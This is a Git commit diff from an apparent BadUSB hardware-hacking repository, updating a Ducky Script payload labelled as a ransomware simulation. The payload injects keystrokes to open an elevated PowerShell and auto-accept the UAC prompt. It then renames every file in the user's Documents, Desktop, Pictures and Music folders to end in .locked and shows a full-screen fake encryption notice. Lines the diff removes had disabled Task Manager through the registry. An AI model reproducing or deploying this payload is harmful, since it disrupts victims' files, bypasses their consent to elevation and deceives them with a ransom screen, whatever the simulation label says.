Hardware-Hacking/BadUSB
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update 1. RansomwareSimulation

Browse Source
This commit is contained in:
Mark
2024-05-14 16:05:39 -04:00
committed by GitHub
parent c1327e9b77
commit 13199e17f0
1 changed files with 10 additions and 17 deletions
Download Patch File Download Diff File Expand all files Collapse all files
1. RansomwareSimulation
+10 -17
View File
@@ -1,34 +1,27 @@
REM This script was created by github.com/MarkCyber
REM This script is intended to act as a simulation of a ransomware attack
REM This script will change file extensions to .locked rather than encrypting the files
REM This script will change all file extensions to .locked rather than encrypting the files
REM This script will also display a simulated encrypted message
DELAY 1000
DELAY 500
GUI r
DELAY 2000
DELAY 100
STRING powershell -Command "Start-Process powershell -Verb runAs"
ENTER
DELAY 2000
DELAY 500
ALT y
DELAY 2000
DELAY 500
REM Check for admin privileges and proceed with Task Manager disable attempt
STRING if(-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { exit }
REM Rename files in specified locations to append .locked to every file
STRING $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File; foreach ($file in $files) { $null = $file | Rename-Item -NewName {$file.Name + '.locked'}; if (-not $?){ $errorOccurred = $true } } }
STRING IF ($errorOccurred) { exit }
ENTER
STRING $regPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'; $regName = 'DisableTaskMgr'; Set-ItemProperty -Path $regPath -Name $regName -Value 1
ENTER
DELAY 2000
REM Rename files in specified locations
STRING $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File | Where-Object { $_.Extension -match '\.doc$|\.xls$|\.jpg$|\.png$|\.mp3$' }; foreach ($file in $files) { $null = $file | Rename-Item -NewName {$file.Name + '.locked'}; if (-not $?){ $errorOccurred = $true } } }
IF ($errorOccurred) { exit }
ENTER
DELAY 3000
DELAY 1000
REM Display ransomware message
STRING Add-Type -AssemblyName PresentationFramework; $Window = New-Object System.Windows.Window; $Window.WindowStartupLocation = 'CenterScreen'; $Window.WindowState = 'Maximized'; $Window.Topmost = $true; $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'; $Window.ShowDialog()
ENTER
DELAY 3000
DELAY 1000
STRING exit
ENTER